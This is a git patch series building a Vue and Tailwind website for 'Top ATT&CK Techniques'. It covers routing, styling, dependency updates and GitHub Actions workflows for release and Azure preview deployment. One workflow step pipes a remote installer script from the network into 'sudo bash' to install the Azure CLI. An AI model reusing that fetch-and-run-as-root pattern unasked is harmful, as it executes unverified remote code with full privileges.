@@ -0,0 +1,7 @@ +// eslint-disable-next-line no-undef +module.exports = { + plugins: { + tailwindcss: {}, + autoprefixer: {}, + }, +}; diff --git a/public/favicon.ico b/public/favicon.ico new file mode 100644 index 0000000000000000000000000000000000000000..df36fcfb72584e00488330b560ebcf34a41c64c2 GIT binary patch literal 4286 zcmds*O-Phc6o&64GDVCEQHxsW(p4>LW*W<827=Unuo8sGpRux(DN@jWP-e29Wl%wj zY84_aq9}^Am9-cWTD5GGEo#+5Fi2wX_P*bo+xO!)p*7B;iKlbFd(U~_d(U?#hLj56 zPhFkj-|A6~Qk#@g^#D^U0XT1cu=c-vu1+SElX9NR;kzAUV(q0|dl0|%h|dI$%VICy zJnu2^L*Te9JrJMGh%-P79CL0}dq92RGU6gI{v2~|)p}sG5x0U*z<8U;Ij*hB9z?ei z@g6Xq-pDoPl=MANPiR7%172VA%r)kevtV-_5H*QJKFmd;8yA$98zCxBZYXTNZ#QFk2(TX0;Y2dt&WitL#$96|gJY=3xX zpCoi|YNzgO3R`f@IiEeSmKrPSf#h#Qd<$%Ej^RIeeYfsxhPMOG`S`Pz8q``=511zm zAm)MX5AV^5xIWPyEu7u>qYs?pn$I4nL9J!=K=SGlKLXpE<5x+2cDTXq?brj?n6sp= zphe9;_JHf40^9~}9i08r{XM$7HB!`{Ys~TK0kx<}ZQng`UPvH*11|q7&l9?@FQz;8 zx!=3<4seY*%=OlbCbcae?5^V_}*K>Uo6ZWV8mTyE^B=DKy7-sdLYkR5Z?paTgK-zyIkKjIcpyO z{+uIt&YSa_$QnN_@t~L014dyK(fOOo+W*MIxbA6Ndgr=Y!f#Tokqv}n<7-9qfHkc3 z=>a|HWqcX8fzQCT=dqVbogRq!-S>H%yA{1w#2Pn;=e>JiEj7Hl;zdt-2f+j2%DeVD zsW0Ab)ZK@0cIW%W7z}H{&~yGhn~D;aiP4=;m-HCo`BEI+Kd6 z={Xwx{TKxD#iCLfl2vQGDitKtN>z|-AdCN|$jTFDg0m3O`WLD4_s#$S literal 0 HcmV?d00001 diff --git a/src/App.vue b/src/App.vue new file mode 100644 index 0000000..4b0b6ba --- /dev/null +++ b/src/App.vue @@ -0,0 +1,17 @@ + + + + + diff --git a/src/assets/logo.svg b/src/assets/logo.svg new file mode 100644 index 0000000..bc826fe --- /dev/null +++ b/src/assets/logo.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/src/components/Calculator.vue b/src/components/Calculator.vue new file mode 100644 index 0000000..cadbd8d --- /dev/null +++ b/src/components/Calculator.vue @@ -0,0 +1,21 @@ + + + + + diff --git a/src/components/Help.vue b/src/components/Help.vue new file mode 100644 index 0000000..1ac55a6 --- /dev/null +++ b/src/components/Help.vue @@ -0,0 +1,17 @@ + + + + + diff --git a/src/components/Home.vue b/src/components/Home.vue new file mode 100644 index 0000000..dd0a868 --- /dev/null +++ b/src/components/Home.vue @@ -0,0 +1,22 @@ + + + + + \ No newline at end of file diff --git a/src/components/Methodology.vue b/src/components/Methodology.vue new file mode 100644 index 0000000..f36cdec --- /dev/null +++ b/src/components/Methodology.vue @@ -0,0 +1,17 @@ + + + + + diff --git a/src/components/Navigation.vue b/src/components/Navigation.vue new file mode 100644 index 0000000..e1402f9 --- /dev/null +++ b/src/components/Navigation.vue @@ -0,0 +1,46 @@ + + + + + diff --git a/src/index.css b/src/index.css new file mode 100644 index 0000000..0d6c614 --- /dev/null +++ b/src/index.css @@ -0,0 +1,23 @@ +@tailwind base; +@tailwind components; +@tailwind utilities; + +#page-body { + @apply mt-20 +} + +#app { + font-family: "Roboto Condensed", sans-serif; +} + +.p-tabmenu .p-tabmenu-nav .p-tabmenuitem .p-menuitem-link { + border-top-right-radius: 0; + border-top-left-radius: 0; +} +.p-menuitem-link { + @apply bg-mitre-primary-purple uppercase; + font-family: "Roboto Condensed", sans-serif; +} +.p-menuitem-text { + @apply my-2 +} \ No newline at end of file diff --git a/src/main.ts b/src/main.ts new file mode 100644 index 0000000..023f25e --- /dev/null +++ b/src/main.ts @@ -0,0 +1,10 @@ +import { createApp } from "vue"; +import { router } from "./router"; +import { createPinia } from "pinia"; +import App from "./App.vue"; +import "./index.css"; +import PrimeVue from "primevue/config"; +import "primevue/resources/themes/mdc-light-deeppurple/theme.css"; + +const pinia = createPinia(); +createApp(App).use(pinia).use(router).use(PrimeVue).mount("#app"); diff --git a/src/router/index.ts b/src/router/index.ts new file mode 100644 index 0000000..c371c85 --- /dev/null +++ b/src/router/index.ts @@ -0,0 +1,35 @@ +import { createRouter, createWebHistory } from "vue-router"; +import Home from "@/components/Home.vue"; +import Methodology from "@/components/Methodology.vue"; +import Help from "@/components/Help.vue"; +import Calculator from "@/components/Calculator.vue"; + +const routes = [ + { + path: "/", + name: "home", + component: Home, + }, + { + path: "/methodology", + name: "methodology", + component: Methodology, + }, + { + path: "/help", + name: "help", + component: Help, + }, + { + path: "/calculator", + name: "calculator", + component: Calculator, + }, +]; + +const router = createRouter({ + history: createWebHistory(), + routes: routes, +}); + +export { router }; diff --git a/src/shims-vue.d.ts b/src/shims-vue.d.ts new file mode 100644 index 0000000..07ac950 --- /dev/null +++ b/src/shims-vue.d.ts @@ -0,0 +1,6 @@ +/* eslint-disable */ +declare module '*.vue' { + import type { DefineComponent } from 'vue' + const component: DefineComponent<{}, {}, any> + export default component +} diff --git a/src/stores/example.store.ts b/src/stores/example.store.ts new file mode 100644 index 0000000..96d47a1 --- /dev/null +++ b/src/stores/example.store.ts @@ -0,0 +1,6 @@ +import { defineStore } from "pinia"; + +export const useExampleStore = defineStore("example", () => { + const name = "Top ATT&CK Techniques"; + return { name }; +}); diff --git a/tailwind.config.js b/tailwind.config.js new file mode 100644 index 0000000..ad5862e --- /dev/null +++ b/tailwind.config.js @@ -0,0 +1,24 @@ +/** @type {import('tailwindcss').Config} */ +// eslint-disable-next-line no-undef +module.exports = { + content: ["./index.html", "./src/**/*.{vue,js,ts,jsx,tsx}"], + theme: { + extend: { + colors: { + mitre: { + blue: "#005B94", + highlighter: "#FFF601", + "dark-navy": "#0B2338", + navy: "#0D2F4F", + "light-blue": "#87DEFF", + black: "#111921", + "dark-gray": "#7E8284", + silver: "#D4D4D3", + "light-silver": "#F1F3F4", + "primary-purple": "#5C6FC6", + }, + }, + }, + }, + plugins: [], +}; diff --git a/tsconfig.json b/tsconfig.json new file mode 100644 index 0000000..99f3e54 --- /dev/null +++ b/tsconfig.json @@ -0,0 +1,10 @@ +{ + "compilerOptions": { + "outDir": "./built", + "allowJs": true, + "target": "es5" + }, + "include": [ + "./src/**/*" + ] +} \ No newline at end of file diff --git a/vite.config.js b/vite.config.js new file mode 100644 index 0000000..5d02fc2 --- /dev/null +++ b/vite.config.js @@ -0,0 +1,14 @@ +import { fileURLToPath, URL } from "url"; + +import { defineConfig } from "vite"; +import vue from "@vitejs/plugin-vue"; + +// https://vitejs.dev/config/ +export default defineConfig({ + plugins: [vue()], + resolve: { + alias: { + "@": fileURLToPath(new URL("./src", import.meta.url)), + }, + }, +}); From d660915f0b97c07872b9990d99048e8cacee5bff Mon Sep 17 00:00:00 2001 From: Allison Robbins Date: Thu, 11 Apr 2024 09:13:02 -0400 Subject: [PATCH 02/21] Tat 123 create homepage initial (#8) * get hero section working * initial hero structure * update hero with design feedback * set up content for small screens * feat(TAT-123): final styling touches * feat(#123): fix navbar responsiveness * feat(TAT-123): update tailwind scheme to ctid scheme * ci: install Azure website previews and `release-please` * ci: re-enable linter * bugfix(TAT-123): fix img parameters and component names * refactor(TAT-123): fix css bug for mobile menu * refactor(TAT-123): replace & with @amp; --------- Co-authored-by: arobbins Co-authored-by: Michael Carenzo <79934822+mikecarenzo@users.noreply.github.com> --- .github/workflows/release-please.yml | 21 + .github/workflows/website-build.yml | 131 +++ .release-please-manifest.json | 1 + index.html | 5 + package-lock.json | 787 ++++++++++++++++-- package.json | 17 +- release-please-config.json | 71 ++ src/App.vue | 6 +- src/assets/arrow-right.svg | 22 + src/assets/book.svg | 12 + src/assets/calculator.svg | 8 + src/assets/help.svg | 4 + src/assets/list.svg | 8 + src/assets/menu.svg | 4 + .../{Calculator.vue => CalculatorPage.vue} | 0 src/components/{Help.vue => HelpPage.vue} | 0 src/components/Home.vue | 22 - src/components/HomePage.vue | 95 +++ .../{Methodology.vue => MethodologyPage.vue} | 0 src/components/Navigation.vue | 46 - src/components/NavigationMenu.vue | 64 ++ src/components/SectionItem.vue | 39 + src/components/TopTen.vue | 17 + src/index.css | 63 +- src/router/index.ts | 24 +- tailwind.config.js | 14 +- tsconfig.app.json | 13 + tsconfig.json | 17 +- tsconfig.node.json | 18 + 29 files changed, 1330 insertions(+), 199 deletions(-) create mode 100644 .github/workflows/release-please.yml create mode 100644 .github/workflows/website-build.yml create mode 100644 .release-please-manifest.json create mode 100644 release-please-config.json create mode 100644 src/assets/arrow-right.svg create mode 100644 src/assets/book.svg create mode 100644 src/assets/calculator.svg create mode 100644 src/assets/help.svg create mode 100644 src/assets/list.svg create mode 100644 src/assets/menu.svg rename src/components/{Calculator.vue => CalculatorPage.vue} (100%) rename src/components/{Help.vue => HelpPage.vue} (100%) delete mode 100644 src/components/Home.vue create mode 100644 src/components/HomePage.vue rename src/components/{Methodology.vue => MethodologyPage.vue} (100%) delete mode 100644 src/components/Navigation.vue create mode 100644 src/components/NavigationMenu.vue create mode 100644 src/components/SectionItem.vue create mode 100644 src/components/TopTen.vue create mode 100644 tsconfig.app.json create mode 100644 tsconfig.node.json diff --git a/.github/workflows/release-please.yml b/.github/workflows/release-please.yml new file mode 100644 index 0000000..a564967 --- /dev/null +++ b/.github/workflows/release-please.yml @@ -0,0 +1,21 @@ +name: Update Release + +on: + push: + branches: + - main + +permissions: + contents: write + pull-requests: write + +jobs: + release-please: + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v3 + - name: Update release + uses: google-github-actions/release-please-action@v3 + with: + command: manifest diff --git a/.github/workflows/website-build.yml b/.github/workflows/website-build.yml new file mode 100644 index 0000000..993fe4f --- /dev/null +++ b/.github/workflows/website-build.yml @@ -0,0 +1,131 @@ +name: Build Website + +on: + push: + branches: [main] + pull_request: + +# If another web build starts for the same branch, cancel the previous build. This +# protects us from two builds trying to upload at the same time and clobbering each +# other. +concurrency: + group: ${{ github.workflow }}-${{ github.ref }} + cancel-in-progress: true + +permissions: + contents: read + id-token: write + pages: write + pull-requests: write + +jobs: + tat_website_build: + runs-on: ubuntu-latest + env: + BRANCH_NAME: ${{ github.head_ref || github.ref_name }} + steps: + + # Configure Environment + - uses: actions/checkout@v3 + - uses: actions/setup-node@v3 + id: "setup-node" + with: + node-version: '19' + cache: 'npm' + cache-dependency-path: './package-lock.json' + - name: Install dependencies + run: npm ci + + # Lint + - name: Lint + run: npm run lint + + # Build and Upload Artifact + - name: Type Check + run: npm run type-check + - name: Build + run: npm run build-only -- --base /$BRANCH_NAME/ + - name: Upload artifact + uses: actions/upload-artifact@v3 + with: + name: tat_website + path: ./dist/ + + # Publish to Azure blob only on PRs, not main. + azure_blob: + if: github.ref_name != 'main' + needs: tat_website_build + runs-on: ubuntu-latest + env: + AZURE_STORAGE_ACCOUNT: topattacktechniques + AZURE_STORAGE_SAS_TOKEN: ${{ secrets.AZURE_SAS_TOKEN }} + BRANCH_NAME: ${{ github.head_ref || github.ref_name }} + STATICRYPT_PASS: ${{ secrets.STATICRYPT_PASS }} + steps: + - uses: actions/setup-node@v3 + with: + node-version: "19" + - run: npm install -g staticrypt + - name: Download Web Site + uses: actions/download-artifact@v3 + with: + name: tat_website + path: tat_website + - env: + STATICRYPT_PASS: ${{ secrets.STATICRYPT_PASS }} + run: > + staticrypt --remember 3 --salt b1c18fbb5081eca3e2db08a413b01774 \ + --password $STATICRYPT_PASS --short \ + --template-title "Top ATT&CK Techniques (branch: $BRANCH_NAME)" \ + --template-instructions "The contents of this site are marked TLP:AMBER:CTID-R&D:22-80. Do not share with unauthorized individuals." \ + --template-color-primary "#6241c5" \ + --template-color-secondary "#b2b2b2" \ + --template-button "Log In" \ + -r tat_website/ + - name: Ensure StatiCrypt ran # StatiCrypt will fail without warning; verify it created a directory + run: test -d encrypted + - name: Copy encrypted HTML files + run: rsync -Ir -v --include='*.html' --exclude='*.*' encrypted/tat_website . + - name: Set the branch name + run: mv tat_website "$BRANCH_NAME" + - name: Install Azure CLI + run: curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash + - name: Delete old blobs + run: az storage blob delete-batch -s '$web' --pattern "$BRANCH_NAME/*" + - name: Upload to blob storage + run: az storage blob upload-batch -s . --pattern "$BRANCH_NAME/*" -d '$web' + - uses: actions/github-script@v6 + if: github.event_name == 'pull_request' + with: + script: | + github.rest.issues.createComment({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: `This PR has been published to https://topattacktechniques.z13.web.core.windows.net/${process.env['BRANCH_NAME']}/`, + }) + + # github_pages: + # # This job only runs when committing or merging to main branch. + # if: github.ref_name == 'main' + # needs: tat_website_build + # runs-on: ubuntu-latest + # environment: + # name: github-pages + # url: $\{\{ steps.deployment.outputs.page_url \}\} + + # steps: + # - name: Setup Pages + # uses: actions/configure-pages@v2 + # - name: Download Web Site + # uses: actions/download-artifact@v3 + # with: + # name: tat_website + # path: tat_website + # - name: Upload artifact + # uses: actions/upload-pages-artifact@v1 + # with: + # path: ./tat_website + # - name: Deploy to GitHub Pages + # id: deployment + # uses: actions/deploy-pages@v1 diff --git a/.release-please-manifest.json b/.release-please-manifest.json new file mode 100644 index 0000000..9e26dfe --- /dev/null +++ b/.release-please-manifest.json @@ -0,0 +1 @@ +{} \ No newline at end of file diff --git a/index.html b/index.html index f42c25e..a966151 100644 --- a/index.html +++ b/index.html @@ -10,6 +10,11 @@ href="https://fonts.googleapis.com/css2?family=Roboto+Condensed:wght@100..900&display=swap" rel="stylesheet" /> + + Vite App diff --git a/package-lock.json b/package-lock.json index ded1530..ec9bde8 100644 --- a/package-lock.json +++ b/package-lock.json @@ -1,11 +1,11 @@ { - "name": "simple-project", + "name": "top-attack-techniques", "version": "0.0.0", "lockfileVersion": 3, "requires": true, "packages": { "": { - "name": "simple-project", + "name": "top-attack-techniques", "version": "0.0.0", "dependencies": { "pinia": "^2.0.29", @@ -15,22 +15,36 @@ }, "devDependencies": { "@rushstack/eslint-patch": "^1.1.0", + "@tsconfig/node18": "^18.2.4", "@typescript-eslint/eslint-plugin": "^5.4.0", "@typescript-eslint/parser": "^5.4.0", "@vitejs/plugin-vue": "^4.0.0", + "@vue/eslint-config-typescript": "^13.0.0", + "@vue/tsconfig": "^0.5.1", "autoprefixer": "^10.4.7", "eslint": "^8.5.0", "eslint-plugin-vue": "^9.0.0", + "npm-run-all2": "^6.1.2", "postcss": "^8.4.14", "tailwindcss": "^3.1.4", "typescript": "4.7", - "vite": "^4.0.4" + "vite": "^4.0.4", + "vue-tsc": "^2.0.7" + } + }, + "node_modules/@aashutoshrathi/word-wrap": { + "version": "1.2.6", + "resolved": "https://registry.npmjs.org/@aashutoshrathi/word-wrap/-/word-wrap-1.2.6.tgz", + "integrity": "sha512-1Yjs2SvM8TflER/OD3cOjhWWOZb58A2t7wpE2S9XfBYTiIl+XFhQG2bjy4Pu1I+EAlCNUzRDYDdFwFYUKvXcIA==", + "dev": true, + "engines": { + "node": ">=0.10.0" } }, "node_modules/@babel/parser": { - "version": "7.20.13", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.20.13.tgz", - "integrity": "sha512-gFDLKMfpiXCsjt4za2JA9oTMn70CeseCehb11kRZgvd7+F67Hih3OHOK24cRrWECJ/ljfPGac6ygXAs/C8kIvw==", + "version": "7.24.1", + "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.24.1.tgz", + "integrity": "sha512-Zo9c7N3xdOIQrNip7Lc9wvRPzlRtovHVE4lkz8WEDr7uYh/GMQhSiIgFxGIArRHYdJE5kxtZjAf8rT0xhdLCzg==", "bin": { "parser": "bin/babel-parser.js" }, @@ -390,15 +404,39 @@ "node": ">=12" } }, + "node_modules/@eslint-community/eslint-utils": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/@eslint-community/eslint-utils/-/eslint-utils-4.4.0.tgz", + "integrity": "sha512-1/sA4dwrzBAyeUoQ6oxahHKmrZvsnLCg4RfxW3ZFGGmQkSNQPFNLV9CUEFQP1x9EYXHTo5p6xdhZM1Ne9p/AfA==", + "dev": true, + "dependencies": { + "eslint-visitor-keys": "^3.3.0" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "peerDependencies": { + "eslint": "^6.0.0 || ^7.0.0 || >=8.0.0" + } + }, + "node_modules/@eslint-community/regexpp": { + "version": "4.10.0", + "resolved": "https://registry.npmjs.org/@eslint-community/regexpp/-/regexpp-4.10.0.tgz", + "integrity": "sha512-Cu96Sd2By9mCNTx2iyKOmq10v22jUVQv0lQnlGNy16oE9589yE+QADPbrMGCkA51cKZSg3Pu/aTJVTGfL/qjUA==", + "dev": true, + "engines": { + "node": "^12.0.0 || ^14.0.0 || >=16.0.0" + } + }, "node_modules/@eslint/eslintrc": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-1.4.1.tgz", - "integrity": "sha512-XXrH9Uarn0stsyldqDYq8r++mROmWRI1xKMXa640Bb//SY1+ECYX6VzT6Lcx5frD0V30XieqJ0oX9I2Xj5aoMA==", + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-2.1.4.tgz", + "integrity": "sha512-269Z39MS6wVJtsoUl10L60WdkhJVdPG24Q4eZTH3nnF6lpvSShEK3wQjDX9JRWAUPvPh7COouPpU9IrqaZFvtQ==", "dev": true, "dependencies": { "ajv": "^6.12.4", "debug": "^4.3.2", - "espree": "^9.4.0", + "espree": "^9.6.0", "globals": "^13.19.0", "ignore": "^5.2.0", "import-fresh": "^3.2.1", @@ -413,14 +451,23 @@ "url": "https://opencollective.com/eslint" } }, + "node_modules/@eslint/js": { + "version": "8.57.0", + "resolved": "https://registry.npmjs.org/@eslint/js/-/js-8.57.0.tgz", + "integrity": "sha512-Ys+3g2TaW7gADOJzPt83SJtCDhMjndcDMFVQ/Tj9iA1BfJzFKD9mAUXT3OenpuPHbI6P/myECxRJrofUsDx/5g==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + } + }, "node_modules/@humanwhocodes/config-array": { - "version": "0.11.8", - "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.11.8.tgz", - "integrity": "sha512-UybHIJzJnR5Qc/MsD9Kr+RpO2h+/P1GhOwdiLPXK5TWk5sgTdu88bTD9UP+CKbPPh5Rni1u0GjAdYQLemG8g+g==", + "version": "0.11.14", + "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.11.14.tgz", + "integrity": "sha512-3T8LkOmg45BV5FICb15QQMsyUSWrQ8AygVfC7ZG32zOalnqrilm018ZVCw0eapXux8FtA33q8PSRSstjee3jSg==", "dev": true, "dependencies": { - "@humanwhocodes/object-schema": "^1.2.1", - "debug": "^4.1.1", + "@humanwhocodes/object-schema": "^2.0.2", + "debug": "^4.3.1", "minimatch": "^3.0.5" }, "engines": { @@ -441,9 +488,9 @@ } }, "node_modules/@humanwhocodes/object-schema": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-1.2.1.tgz", - "integrity": "sha512-ZnQMnLV4e7hDlUvw8H+U8ASL02SS2Gn6+9Ac3wGGLIe7+je2AeAOxPY+izIPJDfFDb7eDjev0Us8MO1iFRN8hA==", + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-2.0.2.tgz", + "integrity": "sha512-6EwiSjwWYP7pTckG6I5eyFANjPhmPjUX9JRLUSfNPC7FX7zK9gyZAfUEaECL6ALTpGX5AjnBq3C9XmVWPitNpw==", "dev": true }, "node_modules/@nodelib/fs.scandir": { @@ -487,16 +534,22 @@ "integrity": "sha512-sXo/qW2/pAcmT43VoRKOJbDOfV3cYpq3szSVfIThQXNt+E4DfKj361vaAt3c88U5tPUxzEswam7GW48PJqtKAg==", "dev": true }, + "node_modules/@tsconfig/node18": { + "version": "18.2.4", + "resolved": "https://registry.npmjs.org/@tsconfig/node18/-/node18-18.2.4.tgz", + "integrity": "sha512-5xxU8vVs9/FNcvm3gE07fPbn9tl6tqGGWA9tSlwsUEkBxtRnTsNmwrV8gasZ9F/EobaSv9+nu8AxUKccw77JpQ==", + "dev": true + }, "node_modules/@types/json-schema": { - "version": "7.0.11", - "resolved": "https://registry.npmjs.org/@types/json-schema/-/json-schema-7.0.11.tgz", - "integrity": "sha512-wOuvG1SN4Us4rez+tylwwwCV1psiNVOkJeM3AUWUNWg/jDQY2+HE/444y5gc+jBmRqASOm2Oeh5c1axHobwRKQ==", + "version": "7.0.15", + "resolved": "https://registry.npmjs.org/@types/json-schema/-/json-schema-7.0.15.tgz", + "integrity": "sha512-5+fP8P8MFNC+AyZCDxrB2pkZFPGzqQWUzpSeuuVLvm8VMcorNYavBqoFcxK8bQz4Qsbn4oUEEem4wDLfcysGHA==", "dev": true }, "node_modules/@types/semver": { - "version": "7.3.13", - "resolved": "https://registry.npmjs.org/@types/semver/-/semver-7.3.13.tgz", - "integrity": "sha512-21cFJr9z3g5dW8B0CVI9g2O9beqaThGQ6ZFBqHfwhzLDKUxaqTIy3vnfah/UPkfOiF2pLq+tGz+W8RyCskuslw==", + "version": "7.5.8", + "resolved": "https://registry.npmjs.org/@types/semver/-/semver-7.5.8.tgz", + "integrity": "sha512-I8EUhyrgfLrcTkzV3TSsGyl1tSuPrEDzr0yd5m90UgNxQkyDXULk3b6MlQqTCpZpNtWe1K0hzclnZkTcLBe2UQ==", "dev": true }, "node_modules/@typescript-eslint/eslint-plugin": { @@ -709,6 +762,12 @@ "url": "https://opencollective.com/typescript-eslint" } }, + "node_modules/@ungap/structured-clone": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/@ungap/structured-clone/-/structured-clone-1.2.0.tgz", + "integrity": "sha512-zuVdFrMJiuCDQUMCzQaD6KL28MjnqqN8XnAqiEq9PNm/hCPTSGfrXCOfwj1ow4LFb/tNymJPwsNbVePc1xFqrQ==", + "dev": true + }, "node_modules/@vitejs/plugin-vue": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/@vitejs/plugin-vue/-/plugin-vue-4.0.0.tgz", @@ -722,6 +781,34 @@ "vue": "^3.2.25" } }, + "node_modules/@volar/language-core": { + "version": "2.1.6", + "resolved": "https://registry.npmjs.org/@volar/language-core/-/language-core-2.1.6.tgz", + "integrity": "sha512-pAlMCGX/HatBSiDFMdMyqUshkbwWbLxpN/RL7HCQDOo2gYBE+uS+nanosLc1qR6pTQ/U8q00xt8bdrrAFPSC0A==", + "dev": true, + "dependencies": { + "@volar/source-map": "2.1.6" + } + }, + "node_modules/@volar/source-map": { + "version": "2.1.6", + "resolved": "https://registry.npmjs.org/@volar/source-map/-/source-map-2.1.6.tgz", + "integrity": "sha512-TeyH8pHHonRCHYI91J7fWUoxi0zWV8whZTVRlsWHSYfjm58Blalkf9LrZ+pj6OiverPTmrHRkBsG17ScQyWECw==", + "dev": true, + "dependencies": { + "muggle-string": "^0.4.0" + } + }, + "node_modules/@volar/typescript": { + "version": "2.1.6", + "resolved": "https://registry.npmjs.org/@volar/typescript/-/typescript-2.1.6.tgz", + "integrity": "sha512-JgPGhORHqXuyC3r6skPmPHIZj4LoMmGlYErFTuPNBq9Nhc9VTv7ctHY7A3jMN3ngKEfRrfnUcwXHztvdSQqNfw==", + "dev": true, + "dependencies": { + "@volar/language-core": "2.1.6", + "path-browserify": "^1.0.1" + } + }, "node_modules/@vue/compiler-core": { "version": "3.2.45", "resolved": "https://registry.npmjs.org/@vue/compiler-core/-/compiler-core-3.2.45.tgz", @@ -773,6 +860,320 @@ "resolved": "https://registry.npmjs.org/@vue/devtools-api/-/devtools-api-6.5.0.tgz", "integrity": "sha512-o9KfBeaBmCKl10usN4crU53fYtC1r7jJwdGKjPT24t348rHxgfpZ0xL3Xm/gLUYnc0oTp8LAmrxOeLyu6tbk2Q==" }, + "node_modules/@vue/eslint-config-typescript": { + "version": "13.0.0", + "resolved": "https://registry.npmjs.org/@vue/eslint-config-typescript/-/eslint-config-typescript-13.0.0.tgz", + "integrity": "sha512-MHh9SncG/sfqjVqjcuFLOLD6Ed4dRAis4HNt0dXASeAuLqIAx4YMB1/m2o4pUKK1vCt8fUvYG8KKX2Ot3BVZTg==", + "dev": true, + "dependencies": { + "@typescript-eslint/eslint-plugin": "^7.1.1", + "@typescript-eslint/parser": "^7.1.1", + "vue-eslint-parser": "^9.3.1" + }, + "engines": { + "node": "^18.18.0 || >=20.0.0" + }, + "peerDependencies": { + "eslint": "^8.56.0", + "eslint-plugin-vue": "^9.0.0", + "typescript": ">=4.7.4" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@vue/eslint-config-typescript/node_modules/@typescript-eslint/eslint-plugin": { + "version": "7.4.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/eslint-plugin/-/eslint-plugin-7.4.0.tgz", + "integrity": "sha512-yHMQ/oFaM7HZdVrVm/M2WHaNPgyuJH4WelkSVEWSSsir34kxW2kDJCxlXRhhGWEsMN0WAW/vLpKfKVcm8k+MPw==", + "dev": true, + "dependencies": { + "@eslint-community/regexpp": "^4.5.1", + "@typescript-eslint/scope-manager": "7.4.0", + "@typescript-eslint/type-utils": "7.4.0", + "@typescript-eslint/utils": "7.4.0", + "@typescript-eslint/visitor-keys": "7.4.0", + "debug": "^4.3.4", + "graphemer": "^1.4.0", + "ignore": "^5.2.4", + "natural-compare": "^1.4.0", + "semver": "^7.5.4", + "ts-api-utils": "^1.0.1" + }, + "engines": { + "node": "^18.18.0 || >=20.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "@typescript-eslint/parser": "^7.0.0", + "eslint": "^8.56.0" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@vue/eslint-config-typescript/node_modules/@typescript-eslint/parser": { + "version": "7.4.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/parser/-/parser-7.4.0.tgz", + "integrity": "sha512-ZvKHxHLusweEUVwrGRXXUVzFgnWhigo4JurEj0dGF1tbcGh6buL+ejDdjxOQxv6ytcY1uhun1p2sm8iWStlgLQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/scope-manager": "7.4.0", + "@typescript-eslint/types": "7.4.0", + "@typescript-eslint/typescript-estree": "7.4.0", + "@typescript-eslint/visitor-keys": "7.4.0", + "debug": "^4.3.4" + }, + "engines": { + "node": "^18.18.0 || >=20.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^8.56.0" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@vue/eslint-config-typescript/node_modules/@typescript-eslint/scope-manager": { + "version": "7.4.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-7.4.0.tgz", + "integrity": "sha512-68VqENG5HK27ypafqLVs8qO+RkNc7TezCduYrx8YJpXq2QGZ30vmNZGJJJC48+MVn4G2dCV8m5ZTVnzRexTVtw==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "7.4.0", + "@typescript-eslint/visitor-keys": "7.4.0" + }, + "engines": { + "node": "^18.18.0 || >=20.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@vue/eslint-config-typescript/node_modules/@typescript-eslint/type-utils": { + "version": "7.4.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/type-utils/-/type-utils-7.4.0.tgz", + "integrity": "sha512-247ETeHgr9WTRMqHbbQdzwzhuyaJ8dPTuyuUEMANqzMRB1rj/9qFIuIXK7l0FX9i9FXbHeBQl/4uz6mYuCE7Aw==", + "dev": true, + "dependencies": { + "@typescript-eslint/typescript-estree": "7.4.0", + "@typescript-eslint/utils": "7.4.0", + "debug": "^4.3.4", + "ts-api-utils": "^1.0.1" + }, + "engines": { + "node": "^18.18.0 || >=20.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^8.56.0" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@vue/eslint-config-typescript/node_modules/@typescript-eslint/types": { + "version": "7.4.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-7.4.0.tgz", + "integrity": "sha512-mjQopsbffzJskos5B4HmbsadSJQWaRK0UxqQ7GuNA9Ga4bEKeiO6b2DnB6cM6bpc8lemaPseh0H9B/wyg+J7rw==", + "dev": true, + "engines": { + "node": "^18.18.0 || >=20.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@vue/eslint-config-typescript/node_modules/@typescript-eslint/typescript-estree": { + "version": "7.4.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-7.4.0.tgz", + "integrity": "sha512-A99j5AYoME/UBQ1ucEbbMEmGkN7SE0BvZFreSnTd1luq7yulcHdyGamZKizU7canpGDWGJ+Q6ZA9SyQobipePg==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "7.4.0", + "@typescript-eslint/visitor-keys": "7.4.0", + "debug": "^4.3.4", + "globby": "^11.1.0", + "is-glob": "^4.0.3", 